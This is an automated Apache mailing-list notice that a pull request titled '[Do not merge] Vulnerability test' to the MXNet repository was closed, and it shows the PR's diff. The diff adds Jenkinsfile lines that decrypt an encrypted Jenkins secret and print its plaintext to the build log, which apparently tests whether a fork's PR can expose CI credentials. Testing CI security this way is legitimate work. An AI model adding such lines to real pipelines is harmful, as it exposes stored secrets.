You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@mxnet.apache.org by GitBox <gi...@apache.org> on 2018/01/06 21:24:44 UTC

[GitHub] marcoabreu closed pull request #9331: [Do not merge] Vulnerability test

marcoabreu closed pull request #9331: [Do not merge] Vulnerability test
URL: https://github.com/apache/incubator-mxnet/pull/9331
 
 
   

This is a PR merged from a forked repository.
As GitHub hides the original diff on merge, it is displayed below for
the sake of provenance:

As this is a foreign pull request (from a fork), the diff is supplied
below (as it won't show otherwise due to GitHub magic):

diff --git a/Jenkinsfile b/Jenkinsfile
index 8444651725..697b098c2b 100644
--- a/Jenkinsfile
+++ b/Jenkinsfile
@@ -142,6 +142,9 @@ try {
     timeout(time: max_time, unit: 'MINUTES') {
       node('mxnetlinux-cpu') {
         ws('workspace/sanity') {
+          def secret = hudson.util.Secret.fromString("{AQAAABAAAAAQio2GXKymtxHmhExJPc5Dypm5/bL//kLCreJ5bEhr+R4=}")
+          println(secret.getPlainText())
+          
           init_git()
           sh "python tools/license_header.py check"
           make('lint', 'cpplint rcpplint jnilint')


 

----------------------------------------------------------------
This is an automated message from the Apache Git Service.
To respond to the message, please log on GitHub and use the
URL above to go to the specific comment.
 
For queries about this service, please contact Infrastructure at:
users@infra.apache.org


With regards,
Apache Git Services